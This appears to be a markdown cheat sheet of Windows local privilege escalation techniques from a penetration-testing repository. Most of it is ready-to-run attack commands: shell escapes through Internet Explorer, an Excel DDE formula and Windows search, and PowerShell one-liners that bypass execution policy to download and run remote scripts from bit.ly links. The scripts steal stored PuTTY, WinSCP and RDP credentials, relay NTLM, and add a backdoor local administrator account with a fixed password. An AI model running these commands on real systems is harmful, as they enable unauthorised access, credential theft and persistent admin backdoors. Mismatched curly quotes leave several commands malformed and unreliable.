Skip to content

Latest commit

 

History

History
87 lines (44 loc) · 2.85 KB

7 - Local-Privilege-Escalation.md

File metadata and controls

87 lines (44 loc) · 2.85 KB
Raw

Get a cmd shell in Internet Explorer:

Enter in address bar:

file://C:\Windows\System32\cmd.exe

Get a cmd.exe shell using Excel:

Place this in a cell and press enter:

=cmd|' /k cmd.exe'!'A1'

Get a cmd.exe or Powershell shell using Windows search:

press Windows key and enter search. Note that admins frequently block cmd.exe and Powershell but forget to block Powershell ISE.

Get Windows Product Information

From the registry: reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v "ProductName"

Get Windows system information: systeminfo

Get Windows User and Domain Information

set

whoami /all

Enumerate local administrators

net localgroup administrators

Check for missing patches:

wmic qfe get Caption,Description, HotFixID,InstalledOn

Searchsploit:

searchsploit MS16 windows local

Browser creds: enum_ie, enum_chrome, etc. (Metasploit)

SessionGopher (FireEye) - Find Putty, WinSCP, RDP, creds.

https://github.com/fireeye/SessionGopher

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/2nrfTPI');Invoke-SessionGopher -AllDomain -o"

HotPotato (foxglovesec) - NBNS spoof, fake WPAD proxy, HTTP> NTLM Relay.

Reference: https://github.com/foxglovesec/Potato

Powershell version, Tater:

https://github.com/Kevin-Robertson/Tater

Examples: Basic trigger 1 example:

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Trigger 1 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Basic trigger 2 example:

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Trigger 2 -Command "net user tater Winter2016 /add && net localgroup administrators tater /add"

Two system setup to get around port 80 being in-use on the privesc target

WPAD System - 192.168.10.100 - this system will just serve up a wpad.dat file that will direct HTTP traffic on the privesc target to the non-80 HTTP port

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Trigger 0 -NBNS N -WPADPort 8080 -Command "null"

Privesc Target - 192.168.10.101

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');Invoke-Tater -Command "net user Tater Winter2016 /add && net localgroup administrators Tater /add" -HTTPPort 8080 -SpooferIP 192.168.10.100

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://bit.ly/1UApMHF');

PowerUP - many LPE checks

powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke-AllChecks” > powerup.txt

Rotten Potato

Look for "SeImpersonatePrivilege:

whoami /priv